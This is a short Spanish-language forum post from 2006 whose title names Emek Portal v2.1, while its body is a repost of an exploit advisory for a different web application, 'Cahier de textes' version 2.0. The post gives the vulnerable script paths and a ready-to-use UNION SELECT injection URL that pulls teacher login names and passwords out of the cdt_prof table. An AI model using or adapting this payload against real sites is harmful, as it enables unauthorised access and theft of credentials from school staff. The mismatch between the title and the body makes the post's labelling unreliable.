Home

Emek Portal v2.1 SQL Injection

Enviado por OeX el Sa, 07/10/2006 - 01:29.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#             Cahier  de  textes 
#   Pierre Lemaitre - St L (France) - Ver 2.0
#          
#          Remote SQL injection Exploit
#
#              Discovred By s4mi
#           s4mi[at]linuxmail[dot]org
************************************************
#
#exploit
#
#   http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=[SQL]
or
http://localhost/PATH/lire_a_faire.php?classe_ID=[SQL]

***********************************
expemle of sql code to get admin user and password

http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=-1+union%20select%201,CONCAT(nom_prof,CHAR(58),CHAR(58),passe)%20FROM%20cdt_prof/*
  • 301 lecturas

Enviar un comentario nuevo

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.